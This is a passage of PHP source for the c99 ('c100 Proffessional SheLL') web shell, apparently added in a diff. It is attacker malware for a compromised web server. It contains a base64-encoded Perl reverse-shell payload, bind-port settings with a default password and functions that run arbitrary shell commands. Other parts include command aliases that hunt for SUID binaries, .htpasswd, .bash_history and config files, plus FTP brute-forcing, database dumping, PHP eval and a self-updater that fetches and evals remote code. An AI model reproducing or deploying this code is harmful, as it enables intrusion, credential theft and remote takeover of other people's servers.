+fclose($fp); + +return $cont; +} +/* Highlighted files. +array( +i=>array({regexp},{type},{opentag},{closetag},{break}) +... +) +string {regexp} - regular exp. +int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only +string {opentag} - open html-tag, e.g. "" (default) +string {closetag} - close html-tag, e.g. "" (default) +bool {break} - if TRUE and found match then break +*/ + +$regxp_highlight= array( +array(basename($_SERVER["PHP_SELF"]),1,"",""), // example +array("config.php",1), +array("config.inc.php",1), +array("Settings.php",1) + +// example +); + + + + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99";// default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$irc_connect=""; + + + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( +array("-----------------------------------------------------------", "ls -la"), +array("find all suid files", "find / -type f -perm -04000 -ls"), +array("find suid files in current dir", "find . -type f -perm -04000 -ls"), +array("find all sgid files", "find / -type f -perm -02000 -ls"), +array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), +array("find config.inc.php files", "find / -type f -name config.inc.php"), +array("find config* files", "find / -type f -name \"config*\""), +array("find config* files in current dir", "find . -type f -name \"config*\""), +array("find all writable folders and files", "find / -perm -2 -ls"), +array("find all writable folders and files in current dir", "find . -perm -2 -ls"), +array("find all service.pwd files", "find / -type f -name service.pwd"), +array("find service.pwd files in current dir", "find . -type f -name service.pwd"), +array("find all .htpasswd files", "find / -type f -name .htpasswd"), +array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), +array("find all .bash_history files", "find / -type f -name .bash_history"), +array("find .bash_history files in current dir", "find . -type f -name .bash_history"), +array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), +array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), +array("list file attributes on a Linux second extended file system", "lsattr -va"), +array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( +array("-----------------------------------------------------------", "dir"), +array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Tools",$surl."act=tools&d=%d"), + array("Proc.",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Mail Utilities ",$surl."act=mailer&d=%d"), + array("About",$surl."act=About&d=%d"), + array("Self-Remove",$surl."act=selfremove"), + array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { +if(function_exists('exec')) +{ + @exec($cfe,$res); + $res = join("\n",$res); +} +elseif(function_exists('shell_exec')) +{ + $res = @shell_exec($cfe); +} +elseif(function_exists('system')) +{ + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); +} +elseif(function_exists('passthru')) +{ + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))) +{ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +} + } + return $res; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function err($n,$txt='') +{ +echo '
    '; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
    '; +return null; +} +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { +if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} +header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); +header("HTTP/1.0 401 Unauthorized"); +exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { +$len = ceil($len/2) - 2; +return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { +if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} +elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} +elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} +else {$size = $size . " B";} +return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { +if (($o != ".") and ($o != "..")) +{ +if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} +else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} +if (!$ret) {return $ret;} +} + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} +return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { +if (($o != ".") and ($o != "..")) +{ +$ret = TRUE; +if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} +else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} +if (!$ret) {return $ret;} +} + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} +return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { +if(copy($d,$t)) {return unlink($d);} +else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { +if (($o != ".") and ($o != "..")) +{ +if (!is_dir($d.$o)) {unlink($d.$o);} +else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} +} + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { +if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} +return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { +if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} +elseif (($result = `$cmd`) !== FALSE) {} +elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} +elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} +elseif (is_resource($fp = popen($cmd,"r"))) +{ +$result = ""; +while(!feof($fp)) {$result .= fread($fp,1024);} +pclose($fp); +} + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( +"c99sh_bindport.pl" => "c99sh_bindport_pl.txt", +"c99sh_bindport.c" => "c99sh_bindport_c.txt", +"c99sh_backconn.pl" => "c99sh_backconn_pl.txt", +"c99sh_backconn.c" => "c99sh_backconn_c.txt", +"c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", +"c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { +$data = ltrim($data); +$string = substr($data,3,ord($data{2})); +if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} +if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} +if ($data{0} == "\x99" and $data{1} == "\x03") +{ +$string = explode("\x01",$string); +if ($update) +{ + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { +$fp = fopen(__FILE__,"w"); +if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} +else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } +} +else {return "New version are available: ".$string[1];} +} +elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} +else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { +$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { +// retrive tables-list +$res = mysql_query("SHOW TABLES FROM ".$db, $sock); +if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { +if ((in_array($tab,$onlytabs)) or (!$c)) +{ +if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} +// recieve query for create table structure +$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); +if (!$res) {$ret["err"][] = mysql_smarterror();} +else +{ + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { +while ($row = mysql_fetch_assoc($res)) +{ +$keys = implode("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = addslashes($v);} +$values = implode("', '", $values); +$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; +$out .= $sql; +} + } +} +} + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { +$fp = fopen($file, "w"); +if (!$fp) {$ret["err"][] = 2;} +else +{ +fwrite ($fp, $out); +fclose ($fp); +} + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { +$value = ""; +if (!empty($functs[$k])) {$value .= $functs[$k]."(";} +$value .= "'".addslashes($v)."'"; +if (!empty($functs[$k])) {$value .= ")";} +$result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { +echo ""; +if ($tbl_struct) +{ +echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; +foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";} +echo "
    "; +} + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { +"METHOD"=>array(output_type), +"METHOD1"... +... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( +"SELECT"=>array(3,1), +"SHOW"=>array(2,1), +"DELETE"=>array(1), +"DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { +$result["propertions"] = $types[$op]; +$result["query"]= $query; +if ($types[$op] == 2) +{ +foreach($arr as $k=>$v) +{ + if (strtoupper($v) == "LIMIT") + { +$result["limit"] = $arr[$k+1]; +$result["limit"] = explode(",",$result["limit"]); +if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} +unset($arr[$k],$arr[$k+1]); + } +} +} + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { +if($f != "." && $f != "..") +{ +$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); +if (is_dir($d.$f)) +{ + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} +} +else +{ + $search_i_f++; + if ($bool) + { +if (!empty($a["text"])) +{ +$r = @file_get_contents($d.$f); +if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} +if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} +if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} +else {$bool = strpos(" ".$r,$a["text"],1);} +if ($a["text_not"]) {$bool = !$bool;} +if ($bool) {$found[] = $d.$f; $found_f++;} +} +else {$found[] = $d.$f; $found_f++;} + } +} +} + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { +$v = @ob_get_contents(); +@ob_end_clean(); +@ob_start("ob_gzHandler"); +echo $v; +@ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "ON (secure)"; +} +else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - c100 Shell

    !C100 Proffessional SheLL By Psych0v. !

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { +$bool = $isdiskette = in_array($letter,$safemode_diskettes); +if (!$bool) {$bool = is_dir($letter.":\\");} +if ($bool) +{ +$letters .= "[ "; +if ($letter.":" != $v) {$letters .= $letter;} +else {$letters .= "".$letter."";} +$letters .= " ] "; +} + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { +$item[1] = str_replace("%d",urlencode($d),$item[1]); +$item[1] = str_replace("%sort",$sort,$item[1]); +$v = realpath($d.".."); +if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} +$item[1] = str_replace("%upd",urlencode($v),$item[1]); +echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

